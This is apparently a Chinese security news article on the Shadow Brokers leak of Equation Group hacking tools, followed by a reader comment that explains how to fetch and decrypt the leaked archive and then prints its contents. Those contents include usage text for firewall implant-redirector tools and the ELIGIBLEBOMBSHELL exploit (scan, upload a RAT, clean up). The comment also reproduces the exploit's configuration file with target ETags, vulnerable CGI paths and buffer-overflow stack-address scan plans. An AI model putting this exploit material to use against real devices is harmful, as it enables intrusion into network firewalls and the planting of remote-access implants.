根据国外媒体的最新爆料,美国国安全局(NSA)貌似遭到了黑客的攻击。这个黑客团伙声称他们入侵了“Equation Group”(方程式组织),并将他们从该黑客组织的计算机系统中所获取到的大部分黑客工具全部泄漏在了互联网上。

这一黑客团伙自称为“The Shadow Brokers”(影子经纪人),目前他们已经开始在网上逐步公开盗窃所得的数据了。除此之外,该黑客团伙还表示,他们手中目前仍掌握着大量的机密数据,他们计划在网上举行一次拍卖会,并将这些机密信息出售给竞价最高的竞标者。


Equation Group1

关于Equation Group(方程式组织)

众所周知,Equation Group这一黑客团伙与美国国家安全局(NSA)的关系一直十分密切。而且外界也普遍认为,Equation Group是美国国家安全局的一个下属部门。很多安全研究专家表示,Equation Group这一黑客组织所拥有的技术无论是从复杂程度还是从其先进程度来看,都已经超越了目前绝大多数的黑客团体,而且该黑客组织已经活跃了二十多年了。

Equation Group2

根据卡巴斯基安全实验室在2015年所发表的一篇报告,卡巴斯基实验室的安全研究专家将Equation Group黑客组织形容为世界上最先进的黑客组织。Equation Group还与此前臭名昭著的Regin攻击、震网病毒(Stuxnet)攻击,以及Flame恶意软件平台有关,而且据说这些攻击活动还得到了美国政府的资助。尽管各种各样关于EquationGroup黑客组织的流言满天飞,但是这些说法从未得到过证实。

值得注意的是,虽然卡巴斯基实验室在去年曝光了Equation Group,但是安全研究专家们当时也并没有明确表示该黑客组织在为美国国家安全局工作。由于该组织某些高调的攻击行动代号与NSA泄密者Edward Snowden(斯诺登)泄漏文件中记载的活动信息十分相似,所以外界才会怀疑该组织与NSA有关联。

Equation Group3


就在两天以前,“The Shadow Brokers”黑客组织已经将部分泄漏文件公布在了例如GithubTumblr等网络平台上,但是这些文件在本篇报道发稿之前就已经被删除了。值得注意的是,在这些文件中还包括有NSA用于大规模监控活动的黑客工具在内。该黑客组织表示,如果他们收到了一百万个比特币(总价值大约为五亿六千八百万美金),那么他们就会将所有的泄漏文件全部发布出来。

据了解,这伙黑客目前只提供了百分之六十的泄漏数据,剩下百分之四十的数据将会提供给拍卖竞价最高的人。该黑客组织表示,这些文件中包含有非常复杂的黑客工具,NSA此前曾使用过这些来进行间谍活动。The Shadow Broker发布的数据压缩后大小约为256MB,据称这些文件中还包含有一系列黑客工具,其中最早的黑客工具可以追溯到2010年。

虽然外界无法立刻验证这些数据的有效性,而且也无法确定这些工具是否属于Equation Group黑客组织,但是从批处理脚本和python脚本的编码情况来看,这些数据肯定出自某些非常先进的黑客组织之手。


根据目前所获取到的泄漏文件来看,其中有些黑客工具的名称与泄密者Edward Snowden(爱德华·斯诺登)泄漏的文档中记载的名称是相同的,例如“BANANAGLEE”和“EPICBANANA”。


Equation Group4

Equation Group5

“The Shadow Brokers”的黑客表示:“我们一直都在跟踪Equation Group的网络通信流量,并且成功地入侵了Equation Group。我们从他们的网络系统中发现了大量的网络武器。你可以从上图中看到,我们会给大家免费提供部分文件。所以不用怀疑,我们提供的肯定是目前世界上最好的黑客工具。”


Comae Technologies网络安全公司的创始人Matt Suiche认为:“我还没有对泄漏的漏洞利用工具进行测试,但是从表面上看,这些工具的合法性是毋庸置疑的。”

Motherboard网站认为,The Shadow Broker这一行为的具体动机目前尚不清楚,但如果这些数据是真实的,那么此次攻击事件绝对会成为历史上最严重的一次网络攻击事件了。

为了竞拍剩下百分之四十的泄漏数据,并增加这些信息的可信度,“TheShadow Brokers”还专门发布了一份“邀请函”,并在这份“邀请函”中对这些数据进行了描述。

Equation Group6

Equation Group7

Equation Group8





有些专家推测,The Shadow Broker的真正目的是为了分散媒体的注意力,并试图让美国政府及其情报机构颜面扫地。


安全研究专家“The Grugq”在接受Motherboard的采访时说到:“如果此次事件是一个骗局,那么这一事件背后的始作俑者肯定为此付出了大量的努力,因为这些泄漏文件看起来可信度非常高。”


但是美国国家安全局目前还没有对“The Shadow Brokers”黑客组织的说法予以回应。






  1. 可能有些人不会解压,写一个下载解压方法: 1.下载:MEGA 2.解压:EQGRP-Auction-Files.zip 3.下载pgp; brew install gnupg 4. 解压:

    localhost:~ niming$ gpg /Users/niming/Downloads/EQGRP-Auction-Files/eqgrp-free-file.tar.xz.gpg
    gpg: AES256 加密过的数据
    gpg: 以 1 个密码加密



$ ls -lah *.gpg
-rw-rw-r--@ 1 noname  staff   128M  7 25 10:49 eqgrp-auction-file.tar.xz.gpg
-rw-rw-r--@ 1 noname  staff   182M  7 25 10:50 eqgrp-free-file.tar.xz.gpg


  • BLATSTING -- 穷举爆破
  • EXPLOITS -- 漏洞利用代码
  • OPS -- 攻击操作控制工具包
  • SCRIPTS -- 脚本资源引用库
  • TOOLS -- 辅助工具包(编码转换、IP格式转换、加密解密装换等等)

我们通过分析对应攻击payload的文件名,就能大致上猜测出来,具体哪些防火墙版本受到影响,比如下面这个信息,我们就能通过google搜索出思科的CISCO ASA5505防火墙受影响。

# find /Firewall/BANANAGLEE/BG3000/

Juniper NetScreen-ISG 2000 防火墙

# ls -lah ./Firewall/BARGLEE/BARGLEE3100/Install/LP
drwxr-xr-x  23 noname  staff   782B  8 16 12:35 .
drwxr-xr-x   3 noname  staff   102B  4 10  2010 ..
-rwxr-xr-x   1 noname  staff   1.8M  6 11  2013 BARPUNCH-3110
-rwxr-xr-x   1 noname  staff   2.4M  6 11  2013 BICE-3110
drwxr-xr-x   6 noname  staff   204B  4 10  2010 Modules
-rwxr-xr-x   1 noname  staff   1.7M  6 11  2013 SecondDateCommon-miniprog-3110
-rwxr-xr-x   1 noname  staff   7.8K  6 11  2013 bg_redirect.pl-3110
-rwxr-xr-x   1 noname  staff   431K  6 11  2013 bg_redirector-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 cfMiniProg-3110
-rwxr-xr-x   1 noname  staff   1.1M  6 11  2013 isg1000-moduledata-3113.tgz
-rwxr-xr-x   1 noname  staff   996K  6 11  2013 isg2000-moduledata-3113.tgz
-rwxr-xr-x   1 noname  staff   385K  6 11  2013 keygen-3110
-rwxr-xr-x   1 noname  staff   285K 10 18  2013 maclist
-rwxr-xr-x   1 noname  staff   1.7M  6 11  2013 nsLogMiniProg-3110
-rwxr-xr-x   1 noname  staff   413K  6 11  2013 pd_create_ruleset-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 pd_miniprog-3110
-rwxr-xr-x   1 noname  staff   6.2K  6 11  2013 pd_start_pat.pl-3110
-rwxr-xr-x   1 noname  staff   1.8M  6 11  2013 profilerIpv4-3100
-rwxr-xr-x   1 noname  staff    29M  6 11  2013 ssg300-moduledata-3115.tgz
-rwxr-xr-x   1 noname  staff    29M  6 11  2013 ssg500-moduledata-3115.tgz
-rwxr-xr-x   1 noname  staff    13K  6 11  2013 start_redirector.pl-3110
-rwxr-xr-x   1 noname  staff    42B  6 11  2013 stop_redirector.sh-3110
-rwxr-xr-x   1 noname  staff   1.9M  6 11  2013 tunWiz-3110


# perl pd_start_pat.pl-3110
Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>
       [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number>
       --attack_ip <attack_ip> --intermediate_ip <intermediate_ip>
       --attack_int <interface> --target_int <interface> --port_offset <port offset>
       --trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port>
       [--logdir <logdir>] [--help]

# perl start_redirector.pl-3110 // 隧道攻击工具
Usage: start_redirector.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>
       [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number> --local_ip <ip>
       --clr_tunnel_ip <ip> --enc_tunnel_ip <ip> --orig_src_ip <ip> --enc_redir_ip <ip> --clr_redir_ip <ip>
       --target_ip <ip> --enc_tunnel_pt <port> --enc_redir_pt <port>
       --enc_iface <interface number> --clr_iface <interface number>
       --enc_key <encryption key file> [--proto <protocol>] [--redir_to_target_dest_pt <port>]
       [--redir_to_target_src_pt <port>] [--target_to_redir_dest_pt <port>]
       [--target_to_redir_src_pt <port>] [--tunnel_to_attacker_dest_pt <port>]
       [--tunnel_to_attacker_src_pt <port>] [--restart] --timeout <seconds> [--logdir <logdir>]


# ls -la
-rw-r--r--@  1 noname  staff   6.0K  8 16 12:35 .DS_Store
drwxr-xr-x   8 noname  staff   272B  4 10  2010 BANANAGLEE
drwxr-xr-x   3 noname  staff   102B  4 10  2010 BARGLEE
drwxr-xr-x   9 noname  staff   306B  4 10  2010 BLATSTING
drwxr-xr-x   4 noname  staff   136B  4 10  2010 BUZZDIRECTION
drwxr-xr-x  10 noname  staff   340B  4 10  2010 EXPLOITS
drwxr-xr-x   8 noname  staff   272B  8 16 12:35 OPS
drwxr-xr-x  35 noname  staff   1.2K  8 16 12:35 SCRIPTS
drwxr-xr-x  18 noname  staff   612B  8 16 12:36 TOOLS
drwxr-xr-x   4 noname  staff   136B  8 16 12:35 TURBO
-rw-r--r--   1 noname  staff    19M  4 10  2010 padding

攻击框架的文件构成主要为脚本类型:python、perl、shell 脚本

# find ./ -name *.py | wc -l
# find ./ -name *.pl | wc -l
# find ./ -name *.sh | wc -l


Firewall/EXPLOITS/ELBO/ $ python eligiblebombshell_1.2.0.1.py
Usage: eligiblebombshell_1.2.0.1.py [options]

See -h for specific options (some of which are required).


Scan to find (unknown versions) or confirm (known versions) vulnerability:
  eligiblebombshell_1.2.0.1.py -t -e 012-345-6789 --scan -v

Once a valid entry is in ELBO.config, upload nopen:
  eligiblebombshell_1.2.0.1.py -t -e 012-345-6789 --nopen -n noserver -c -v

Delete uploaded files from the previous step:
  eligiblebombshell_1.2.0.1.py -t -e 012-345-6789 --cleanup -v

eligiblebombshell_1.2.0.1.py: error: -t/--target-ip is required!


# ELBO.config
# format for known versions:
#   ETAG = <ETag> : <action> : 0x<stack addr> : <version>
# format for unknown versions:
#   ETAG = <ETag> : <action> : 0x<stack addr>
# The device returns wacky, invalid ETags sometimes. This file just records
# the "normal" looking parts (without "" and other characters). E.g.:
#    device ETag       |   this file
# ---------------------|------------------
# "e8-569-46b6b873"    | e8-569-46b6b873
# "3991-583-4727f5a3"  | 3991-583-4727f5a3
# W/"55b-583-47958bb3" | 55b-583-47958bb3
# W/"55f-583-47e0a4a8" | 55f-583-47e0a4a8
# W/"600-5e7-494fd7a7" | 600-5e7-494fd7a7
# W/"69a-5e7-49c3697f" | 69a-5e7-49c3697f

# Path to RAT
NOSERVER = /current/up/morerats/staticrats/noserver- 

# ETags from actual hardware

# tested
ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.
ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.
ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.
ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.
ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.
ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.

# added Dec. 2009 - WOBBLYLLAMA
ETAG =  55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.

# added Mar. 2010 - FLOCKFORWARD
ETAG =  6c6-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.

# added Mar. 2010 - HIDDENTEMPLE
ETAG = 1065-569-44aa3cac : /cgi/maincgi.cgi?Url=Index : 0xbfffec70 : tos_3.2.8840.1

# added May. 2010 - CONTAINMENTGRID
ETAG = 83c-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : tos_3.


# added Sep. 2010 - GOTHAMKNIGHT
ETAG = 386f-569-46e895e3 : /cgi/maincgi.cgi?Url=Index : 0xbfffec40 : v3.

# Etags and address from real hardware
#ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffe*** : v3.
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffe*** : v3.
#ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.
#ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.
#ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.
#ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.
#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb40 : v3.
# ETags and addresses from milliways
#ETAG =   e8-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.
#ETAG =  55b-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.
#ETAG =  55f-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.
#ETAG =  600-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.
#ETAG =  69a-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.
#ETAG =   e8-569-46b6b873 : /cgi/maincgi.cgi?Url=Index : 0xbfffec50 : v3.2.100.010_1_pbc_17_iv_3
#ETAG = 3991-583-4727f5a3 : /cgi/maincgi.cgi?Url=Index : 0xbfffe*** : v3.
#ETAG =  55b-583-47958bb3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.
#ETAG =  55f-583-47e0a4a8 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.
#ETAG =  600-5e7-494fd7a7 : /cgi/maincgi.cgi?Url=Index : 0x7fffe*** : v3.
#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffe*** : v3.

# SCANPLAN format (dates are INCLUSIVE and written as hex values just like the third etag field):
#   SCANPLAN = <action> : <min etag date> : <max etag date> : <comma-delimited list of addresses>

# Notes:
# - The full list of addresses must be all on one line.
# - SCANPLAN addresses CANNOT contain a null byte (00) - doing so will break the exploit's
#   buffer overflow.
# - The --etag argument will be matched against the min/max dates of these scanplans. If more than
#   one plan matches, they will be tried in the order they're listed in this file. If none match,
#   the user will get an error to that effect.

# libc attacks - scan plan is simple (try them both)
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1
SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0

# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80,0x7fffd280,0xbfffee80,0x7fffcc80,0xbfffe880,0x7fffd580,0xbffff180,0x7fffc980,0xbfffe580,0x7fffd880,0xbffff480,0x7fffc680,0xbfffe280,0x7fffdb80,0xbffff780,0x7fffc380,0xbfffdf80,0x7fffde80,0xbffffa80,0x7fffe180,0xbfffdc80,0x7fffe480,0xbfffd980,0x7fffe780,0xbfffd680,0x7fffea80,0xbfffd380,0x7fffed80,0xbfffd080,0x7ffff080,0xbfffcd80,0x7ffff380,0xbfffca80,0x7ffff680,0xbfffc780,0x7ffff980,0xbfffc480,0x7ffffc80,0xbfffc180

# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180
# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the high
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x494fd7a7 : 0xffffffff : 0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180
# for dates in between the two, try low and high addresses interleaved
SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x487b260f : 0x494fd7a6 : 0xbfffeb80,0x7fffeb80,0xbfffee80,0x7fffee80,0xbfffe880,0x7fffe880,0xbffff180,0x7ffff180,0xbfffe580,0x7fffe580,0xbffff480,0x7ffff480,0xbfffe280,0x7fffe280,0xbffff780,0x7ffff780,0xbfffdf80,0x7fffdf80,0xbffffa80,0x7ffffa80,0xbfffdc80,0x7fffdc80,0xbfffd980,0x7fffd980,0xbfffd680,0x7fffd680,0xbfffd380,0x7fffd380,0xbfffd080,0x7fffd080,0xbfffcd80,0x7fffcd80,0xbfffca80,0x7fffca80,0xbfffc780,0x7fffc780,0xbfffc480,0x7fffc480,0xbfffc180,0x7fffc180


Equation Group9

【参考来源:TheHackerNewsFreebuf的Mickeyyyyy编译+Zhihu详情  安全脉搏整理发布 】



